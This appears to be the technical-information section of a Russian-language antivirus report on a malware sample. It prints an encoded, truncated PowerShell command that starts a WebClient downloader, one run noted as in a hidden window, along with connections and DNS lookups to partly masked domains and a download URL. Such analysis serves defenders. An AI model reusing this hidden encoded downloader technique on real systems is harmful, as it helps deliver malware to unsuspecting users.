Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiADAAMABfAF8AMgBfAD0AKAAnAGgAXwAyACcAKwAnADcAJwArACcAXwBfADQAJwApADsAJABMADAAOAA4ADEANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABRADIAXwA2ADUAXwA9ACgAJwBoAH...
- 'qn###ker.com':80
- 'qn###ker.com':443
- http://qn###ker.com/tmp/4lP1qLllTh/
- 'qn###ker.com':443
- DNS ASK th####ube.design
- DNS ASK di####se.academy
- DNS ASK qn###ker.com
- DNS ASK am##k20.com
- DNS ASK ma####laholiday.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiADAAMABfAF8AMgBfAD0AKAAnAGgAXwAyACcAKwAnADcAJwArACcAXwBfADQAJwApADsAJABMADAAOAA4ADEANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABRADIAXwA2ADUAXwA9ACgAJwBoAH...' (со скрытым окном)